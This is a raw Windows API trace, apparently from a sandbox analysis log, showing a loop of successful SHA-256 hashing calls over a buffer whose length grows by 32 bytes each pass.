	[0229.815] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.815] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778ac8
	[0229.816] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x2778ac8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2778ac8, pdwDataLen=0x128ba4) returned 1
	[0229.816] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.816] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.816] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.817] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.817] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0xc0, dwFlags=0x0) returned 1
	[0229.817] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.817] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27788c0
	[0229.817] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x27788c0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27788c0, pdwDataLen=0x128ba4) returned 1
	[0229.817] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.817] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.817] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.818] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.818] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0xe0, dwFlags=0x0) returned 1
	[0229.818] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.818] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27788e8
	[0229.818] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x27788e8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27788e8, pdwDataLen=0x128ba4) returned 1
	[0229.818] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.818] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.818] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.818] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.818] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x100, dwFlags=0x0) returned 1
	[0229.818] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.818] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778910
	[0229.818] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x2778910, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2778910, pdwDataLen=0x128ba4) returned 1
	[0229.818] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.818] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.818] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.819] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.819] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x120, dwFlags=0x0) returned 1
	[0229.819] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.819] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778398
	[0229.819] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x2778398, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2778398, pdwDataLen=0x128ba4) returned 1
	[0229.819] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.819] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.819] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.819] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.819] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x140, dwFlags=0x0) returned 1
	[0229.819] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.819] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778280
	[0229.819] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x2778280, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2778280, pdwDataLen=0x128ba4) returned 1
	[0229.819] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.819] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.819] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.820] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.820] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x160, dwFlags=0x0) returned 1
	[0229.820] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.820] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778c80
	[0229.820] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x2778c80, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2778c80, pdwDataLen=0x128ba4) returned 1
	[0229.820] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.820] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.820] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.820] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.820] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x180, dwFlags=0x0) returned 1
	[0229.820] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.820] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778c08
	[0229.820] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x2778c08, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2778c08, pdwDataLen=0x128ba4) returned 1
	[0229.820] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.821] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.821] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.821] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.821] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x1a0, dwFlags=0x0) returned 1
	[0229.821] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.821] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778c58
	[0229.821] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x2778c58, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2778c58, pdwDataLen=0x128ba4) returned 1
	[0229.821] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.821] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.821] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.821] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.821] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x1c0, dwFlags=0x0) returned 1
	[0229.821] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.822] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778cd0
	[0229.822] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x2778cd0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2778cd0, pdwDataLen=0x128ba4) returned 1
	[0229.822] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.822] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.822] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.822] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.822] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x1e0, dwFlags=0x0) returned 1
	[0229.822] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.822] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778b40
	[0229.822] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x2778b40, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2778b40, pdwDataLen=0x128ba4) returned 1
	[0229.822] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.822] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.822] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.823] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.823] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x200, dwFlags=0x0) returned 1
	[0229.823] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.823] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778b68
	[0229.823] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x2778b68, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2778b68, pdwDataLen=0x128ba4) returned 1
	[0229.823] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.823] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.823] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.823] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.823] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x220, dwFlags=0x0) returned 1
	[0229.823] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.823] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778b90
	[0229.823] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x2778b90, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2778b90, pdwDataLen=0x128ba4) returned 1
	[0229.823] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.823] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.823] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.824] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.824] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x240, dwFlags=0x0) returned 1
	[0229.824] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.824] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231c7c0
	[0229.824] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231c7c0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231c7c0, pdwDataLen=0x128ba4) returned 1
	[0229.824] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.824] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.824] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.824] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.824] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x260, dwFlags=0x0) returned 1
	[0229.824] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.824] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b3c0
	[0229.824] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231b3c0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231b3c0, pdwDataLen=0x128ba4) returned 1
	[0229.824] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.824] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.824] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.825] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.825] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x280, dwFlags=0x0) returned 1
	[0229.825] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.825] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231c900
	[0229.825] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231c900, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231c900, pdwDataLen=0x128ba4) returned 1
	[0229.825] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.825] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.825] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.825] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.825] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x2a0, dwFlags=0x0) returned 1
	[0229.825] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.825] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231c928
	[0229.825] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231c928, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231c928, pdwDataLen=0x128ba4) returned 1
	[0229.825] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.825] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.825] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.826] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.826] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x2c0, dwFlags=0x0) returned 1
	[0229.826] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.826] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231c950
	[0229.826] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231c950, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231c950, pdwDataLen=0x128ba4) returned 1
	[0229.826] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.826] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.826] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.826] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.826] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x2e0, dwFlags=0x0) returned 1
	[0229.826] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.826] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231c978
	[0229.826] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231c978, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231c978, pdwDataLen=0x128ba4) returned 1
	[0229.826] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.826] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.826] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.827] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.827] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x300, dwFlags=0x0) returned 1
	[0229.827] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.827] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231c9a0
	[0229.827] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231c9a0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231c9a0, pdwDataLen=0x128ba4) returned 1
	[0229.827] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.827] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.827] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.827] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.827] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x320, dwFlags=0x0) returned 1
	[0229.827] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.827] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231c9c8
	[0229.827] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231c9c8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231c9c8, pdwDataLen=0x128ba4) returned 1
	[0229.828] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.828] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.828] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.828] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.828] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x340, dwFlags=0x0) returned 1
	[0229.828] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.828] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231c9f0
	[0229.828] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231c9f0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231c9f0, pdwDataLen=0x128ba4) returned 1
	[0229.828] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.828] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.828] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.828] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.828] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x360, dwFlags=0x0) returned 1
	[0229.829] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.829] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231ca18
	[0229.829] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231ca18, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231ca18, pdwDataLen=0x128ba4) returned 1
	[0229.829] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.829] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.829] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.829] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.829] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x380, dwFlags=0x0) returned 1
	[0229.829] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.829] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231ca40
	[0229.829] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231ca40, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231ca40, pdwDataLen=0x128ba4) returned 1
	[0229.829] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.829] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.829] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.830] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.830] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x3a0, dwFlags=0x0) returned 1
	[0229.830] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.830] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231ca68
	[0229.830] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231ca68, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231ca68, pdwDataLen=0x128ba4) returned 1
	[0229.830] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.830] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.830] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.830] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.830] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x3c0, dwFlags=0x0) returned 1
